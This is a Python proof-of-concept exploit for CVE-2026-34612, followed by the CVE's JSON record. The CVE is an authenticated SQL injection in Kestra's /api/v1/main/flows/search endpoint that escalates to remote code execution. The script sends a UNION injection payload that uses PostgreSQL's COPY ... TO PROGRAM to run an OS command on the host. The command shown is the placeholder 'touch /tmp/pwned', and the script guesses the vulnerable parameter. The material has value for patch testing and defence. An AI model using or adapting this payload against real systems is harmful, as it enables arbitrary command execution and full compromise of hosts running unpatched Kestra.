CVE-2026-34612

import requests # CVE-2026-34612 PoC: Kestra SQL Injection to RCE # Target: Kestra < 1.3.7 # Endpoint: GET /api/v1/main/flows/search target_url = "http://vulnerable-host:8080/api/v1/main/flows/search" # Replace with a valid authentication token (low privilege is enough) auth_token = "Bearer YOUR_JWT_TOKEN_HERE" # Payload to execute 'touch /tmp/pwned' using PostgreSQL COPY TO PROGRAM # Note: This depends on the table structure, UNION injection is used here as an example payload = "' UNION SELECT 1,2,3,4,5,6,7; COPY (SELECT '') TO PROGRAM 'touch /tmp/pwned'--" headers = { "Authorization": auth_token } params = { "q": payload # Assuming 'q' is the vulnerable parameter based on search endpoint context } try: print(f"Sending payload to {target_url}...") response = requests.get(target_url, headers=headers, params=params, timeout=10) if response.status_code == 200: print("Request sent successfully. Check if command executed on host.") else: print(f"Request failed with status code: {response.status_code}") except Exception as e: print(f"An error occurred: {e}")

{"cve": {"id": "CVE-2026-34612", "sourceIdentifier": "[email protected]", "published": "2026-04-03T23:17:04.587", "lastModified": "2026-04-13T17:36:59.393", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Kestra is an open-source, event-driven orchestration platform. Prior to version 1.3.7, Kestra (default docker-compose deployment) contains a SQL Injection vulnerability that leads to Remote Code Execution (RCE) in the following endpoint \"GET /api/v1/main/flows/search\". Once a user is authenticated, simply visiting a crafted link is enough to trigger the vulnerability. The injected payload is executed by PostgreSQL using COPY ... TO PROGRAM ..., which in turn runs arbitrary OS commands on the host. This issue has been patched in version 1.3.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", "baseScore": 9.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kestra:kestra:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.3.7", "matchCriteriaId": "0EAC1A4D-3CFB-44C4-9EC1-3D27B2781397"}]}]}], "references": [{"url": "https://github.com/kestra-io/kestra/commit/3926762795df8ad3e03924b370c51832ed3a21d3", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/kestra-io/kestra/releases/tag/v1.3.7", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/kestra-io/kestra/security/advisories/GHSA-365w-2m69-mp9x", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}, {"url": "https://github.com/kestra-io/kestra/security/advisories/GHSA-365w-2m69-mp9x", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}